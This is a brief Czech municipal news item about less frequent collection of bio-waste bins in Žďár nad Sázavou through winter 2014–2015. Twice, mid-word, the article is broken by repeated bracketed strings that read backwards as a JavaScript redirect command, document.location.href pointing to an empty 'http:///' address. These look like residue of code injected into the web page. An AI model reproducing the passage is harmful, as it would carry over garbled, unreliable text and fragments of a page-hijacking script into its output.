biopopelnice
Rainbow page separator

Biopopelnice se budou vyvážet v delších intervalech

Pátek, 28. listopadu 2014

Žďár nad Sázavou / Pouze jednou za čtrnáct dní, namís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to týdenního pravidelného vývozu, se budou od začátku lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu ve Žďáře vyvážet biopopelnice, které jsou rozmístěny po městě. Čtrnáctidenní interval však bude platit pouze do posledního prosince, přičemž se popelnice budou vyvážet každé úterý sudého týdne.
Od nového roku se četnost vývozu biopopelnic se zbytky z kuchyní a zahrádek s ohledem na aktuální zimní období ještě sníží. Od ledna do března se budou nádoby s odpadem vyvážet pouze jednou do měsíce, přičemž o konkrétních termínech a době vývozu budou úředníci městského úřadu veřejnost s předstihem informovat.